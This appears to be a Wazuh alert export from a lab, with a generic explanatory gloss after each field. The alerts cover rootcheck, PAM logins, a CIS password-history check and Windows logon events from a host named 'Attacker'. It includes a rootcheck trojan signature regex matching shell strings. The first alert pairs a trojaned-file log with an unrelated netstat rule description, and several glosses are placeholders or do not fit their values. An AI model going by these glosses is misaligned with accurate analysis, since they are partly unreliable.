manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533781.32617 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
full_log: Trojaned version of file '/usr/bin/diff' detected. Signature used: 'bash|^/bin/sh|file\.h|proc\.h|/dev/[^n]|^/bin/.*sh' (Generic). The complete raw log message before parsing – last‑resort truth for deep dives.
decoder.name: rootcheck Name of the Wazuh decoder that parsed this raw log.
data.title: Trojaned version of file detected. Short title some decoders add – usually informational.
data.file: /usr/bin/diff Generic file path referenced in the log.
location: rootcheck Which log source produced the event (e.g., sysmon, auditd).
rule.description: Listened ports status (netstat) changed (new port opened or closed). Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 533 Numeric ID of the detection rule that fired.
rule.firedtimes: 1 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['ossec'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.pci_dss: ['10.2.7', '10.6.1'] PCI DSS mapping – card‑holder data rules.
rule.gpg13: ['10.1'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.hipaa: ['164.312.b'] HIPAA mapping – healthcare data exposure.
rule.nist_800_53: ['AU.14', 'AU.6'] NIST 800‑53 mapping – US Fed controls.
agent.id: 000 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: server1 Hostname of the source machine. Handy when matching with AD or your CMDB.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533785.34367 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
full_log: 2025-04-24T22:29:45.348195+00:00 server1 login[1202]: PAM unable to dlopen(pam_lastlog.so): /usr/lib/security/pam_lastlog.so: cannot open shared object file: No such file or directory The complete raw log message before parsing – last‑resort truth for deep dives.
predecoder.program_name: login Process that originally wrote the log line (e.g., sshd, sudo).
predecoder.timestamp: 2025-04-24T22:29:45.348195+00:00 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: /var/log/auth.log Which log source produced the event (e.g., sysmon, auditd).
agent.id: 000 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: server1 Hostname of the source machine. Handy when matching with AD or your CMDB.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533793.35029 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
full_log: 2025-04-24T22:29:53.449652+00:00 server1 login[1202]: pam_unix(login:session): session opened for user simba(uid=1000) by simba(uid=0) The complete raw log message before parsing – last‑resort truth for deep dives.
predecoder.program_name: login Process that originally wrote the log line (e.g., sshd, sudo).
predecoder.timestamp: 2025-04-24T22:29:53.449652+00:00 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
decoder.parent: pam Parent decoder used – for nested parsing.
decoder.name: pam Name of the Wazuh decoder that parsed this raw log.
data.srcuser: simba User on the originating host – watch for root / SYSTEM used remotely.
data.dstuser: simba(uid=1000) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.uid: 0 Numeric user ID – pairs with username when name missing.
location: /var/log/auth.log Which log source produced the event (e.g., sysmon, auditd).
agent.id: 000 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: server1 Hostname of the source machine. Handy when matching with AD or your CMDB.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533795.35488 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
full_log: 2025-04-24T22:29:53.669158+00:00 server1 (systemd): pam_unix(systemd-user:session): session opened for user simba(uid=1000) by simba(uid=0) The complete raw log message before parsing – last‑resort truth for deep dives.
predecoder.program_name: (systemd) Process that originally wrote the log line (e.g., sshd, sudo).
predecoder.timestamp: 2025-04-24T22:29:53.669158+00:00 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
decoder.parent: pam Parent decoder used – for nested parsing.
decoder.name: pam Name of the Wazuh decoder that parsed this raw log.
data.srcuser: simba User on the originating host – watch for root / SYSTEM used remotely.
data.dstuser: simba(uid=1000) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.uid: 0 Numeric user ID – pairs with username when name missing.
location: /var/log/auth.log Which log source produced the event (e.g., sysmon, auditd).
CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Enforce password history' is set to '24 or more password(s)'.: Status changed from failed to 'not applicable'
🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Enforce password history' is set to '24 or more password(s)'.: Status changed from failed to 'not applicable'
rule.description: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Enforce password history' is set to '24 or more password(s)'.: Status changed from failed to 'not applicable' Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 19013 Numeric ID of the detection rule that fired.
rule.firedtimes: 1 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sca'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.pci_dss: ['2.2'] PCI DSS mapping – card‑holder data rules.
rule.nist_800_53: ['CM.1'] NIST 800‑53 mapping – US Fed controls.
rule.cis: ['1.1.1'] Maps to CIS benchmark controls – governance folks love this.
rule.cis_csc: ['5.2'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533879.35952 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: sca Name of the Wazuh decoder that parsed this raw log.
data.sca.type: check Scan engine type (script, registry, pkg). Good to know when writing fixes.
data.sca.scan_id: 2137254061 Session ID grouping all checks from the same run.
data.sca.policy: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0 Name of the benchmark policy (e.g., CIS Ubuntu 20.04).
data.sca.check.id: 26000 Unique ID for this single check – copy to search historic runs.
data.sca.check.title: Ensure 'Enforce password history' is set to '24 or more password(s)'. Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).
data.sca.check.description: This policy setting determines the number of renewed, unique passwords that have to be associated with a user account before you can reuse an old password. The value for this policy setting must be between 0 and 24 passwords. The default value for Windows Vista is 0 passwords, but the default setting in a domain is 24 passwords. To maintain the effectiveness of this policy setting, use the Minimum password age setting to prevent users from repeatedly changing their password. The recommended state for this setting is: 24 or more password(s). Note: Password Policy settings (section 1.1) and Account Lockout Policy settings (section 1.2) must be applied via the Default Domain Policy GPO in order to be globally in effect on domain user accounts as their default behavior. If these settings are configured in another GPO, they will only affect local user accounts on the computers that receive the GPO. However, custom exceptions to the default password policy and account lockout policy rules for specific domain users and/or groups can be defined using Password Settings Objects (PSOs), which are completely separate from Group Policy and most easily configured using Active Directory Administrative Center. Note #2: As of the publication of this benchmark, Microsoft currently has a maximum limit of 24 saved passwords. For more information, please visit Enforce password history (Windows 10) - Windows security | Microsoft Docs Detailed what/why of the check – great learning resource.
data.sca.check.rationale: The longer a user uses the same password, the greater the chance that an attacker can determine the password through brute force attacks. Also, any accounts that may have been compromised will remain exploitable for as long as the password is left unchanged. If password changes are required but password reuse is not prevented, or if users continually reuse a small number of passwords, the effectiveness of a good password policy is greatly reduced. If you specify a low number for this policy setting, users will be able to use the same small number of passwords repeatedly. If you do not also configure the Minimum password age setting, users might repeatedly change their passwords until they can reuse their original password. Why this matters (compliance / security impact).
data.sca.check.remediation: To establish the recommended configuration via GP, set the following UI path to 24 or more password(s): Computer Configuration\Policies\Windows Settings\Security Settings\Account Policies\Password Policy\Enforce password history Vendor‑recommended fix text – copy‑paste for hardening tickets.
data.sca.check.compliance.cis: 1.1.1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.cis_csc: 5.2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.command: ['net.exe accounts'] Shell/registry query used in the test – reproduce it yourself when verifying.
data.sca.check.result: not applicable PASS or FAIL. Red = needs fixing.
data.sca.check.reason: Timeout overtaken running command 'net.exe accounts' No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.previous_result: failed Last run’s pass/fail – trend spotting for drift.
location: sca Which log source produced the event (e.g., sysmon, auditd).
rule.description: License activation (slui.exe) failed. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 60646 Numeric ID of the detection rule that fired.
rule.firedtimes: 1 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['windows', 'windows_application'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533881.42181 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-SPP No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {E23B33B0-C8C9-472C-A5F9-F2BDFEA0F156} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventSourceName: Software Protection Platform Service No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 8198 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 0 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x80000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-17T16:37:43.0293769Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 2351 Incremental log record number – handy for timeline order.
data.win.system.processID: 9692 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Application No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: ERROR TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "License Activation (slui.exe) failed with the following error code:
hr=0x80004005
Command-line arguments:
RuleId=31e71c49-8da7-4a2f-ad92-45d98a1c79ba;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c;NotificationInterval=1440;Trigger=NetworkAvailable" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.data: hr=0x80004005, RuleId=31e71c49-8da7-4a2f-ad92-45d98a1c79ba;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c;NotificationInterval=1440;Trigger=NetworkAvailable No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533881.44501 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-Auditing No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 4624 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 12544 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8020000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-17T16:37:04.3626123Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 43449 Incremental log record number – handy for timeline order.
data.win.system.processID: 792 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 8984 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Security No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: AUDIT_SUCCESS TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "An account was successfully logged on.
Subject:
Security ID: S-1-5-18
Account Name: ATTACKER$
Account Domain: WORKGROUP
Logon ID: 0x3E7
Logon Information:
Logon Type: 5
Restricted Admin Mode: -
Remote Credential Guard: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: S-1-5-18
Account Name: SYSTEM
Account Domain: NT AUTHORITY
Logon ID: 0x3E7
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0x304
Process Name: C:\Windows\System32\services.exe
Network Information:
Workstation Name: -
Source Network Address: -
Source Port: -
Detailed Authentication Information:
Logon Process: Advapi
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserName: ATTACKER$ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectDomainName: WORKGROUP No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserName: SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetDomainName: NT AUTHORITY No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonType: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonProcessName: Advapi No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.authenticationPackageName: Negotiate No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {00000000-0000-0000-0000-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.keyLength: 0 Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.
data.win.eventdata.processId: 0x304 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processName: C:\\Windows\\System32\\services.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.impersonationLevel: %%1833 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.virtualAccount: %%1843 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLinkedLogonId: 0x0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.elevatedToken: %%1842 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Software protection service scheduled successfully. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 60642 Numeric ID of the detection rule that fired.
rule.firedtimes: 1 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['windows', 'windows_application'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533882.51836 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-SPP No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {E23B33B0-C8C9-472C-A5F9-F2BDFEA0F156} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventSourceName: Software Protection Platform Service No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 16384 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 0 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x80000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-17T16:38:35.2666112Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 2353 Incremental log record number – handy for timeline order.
data.win.system.processID: 13324 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Application No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Successfully scheduled Software Protection service for re-start at 2025-04-18T16:36:35Z. Reason: RulesEngine." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.data: 2025-04-18T16:36:35Z, RulesEngine No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533882.53416 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-Auditing No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 4624 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 12544 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8020000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-17T16:37:05.5675781Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 43451 Incremental log record number – handy for timeline order.
data.win.system.processID: 792 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 8984 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Security No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: AUDIT_SUCCESS TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "An account was successfully logged on.
Subject:
Security ID: S-1-5-18
Account Name: ATTACKER$
Account Domain: WORKGROUP
Logon ID: 0x3E7
Logon Information:
Logon Type: 5
Restricted Admin Mode: -
Remote Credential Guard: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: S-1-5-18
Account Name: SYSTEM
Account Domain: NT AUTHORITY
Logon ID: 0x3E7
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0x304
Process Name: C:\Windows\System32\services.exe
Network Information:
Workstation Name: -
Source Network Address: -
Source Port: -
Detailed Authentication Information:
Logon Process: Advapi
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserName: ATTACKER$ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectDomainName: WORKGROUP No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserName: SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetDomainName: NT AUTHORITY No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonType: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonProcessName: Advapi No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.authenticationPackageName: Negotiate No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {00000000-0000-0000-0000-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.keyLength: 0 Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.
data.win.eventdata.processId: 0x304 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processName: C:\\Windows\\System32\\services.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.impersonationLevel: %%1833 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.virtualAccount: %%1843 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLinkedLogonId: 0x0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.elevatedToken: %%1842 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Software protection service scheduled successfully. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 60642 Numeric ID of the detection rule that fired.
rule.firedtimes: 2 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['windows', 'windows_application'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533882.60751 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-SPP No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {E23B33B0-C8C9-472C-A5F9-F2BDFEA0F156} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventSourceName: Software Protection Platform Service No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 16384 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 0 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x80000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-17T16:43:41.5201262Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 2355 Incremental log record number – handy for timeline order.
data.win.system.processID: 10268 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Application No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Successfully scheduled Software Protection service for re-start at 2025-04-18T16:36:41Z. Reason: RulesEngine." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.data: 2025-04-18T16:36:41Z, RulesEngine No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533883.62331 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-Auditing No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 4624 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 12544 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
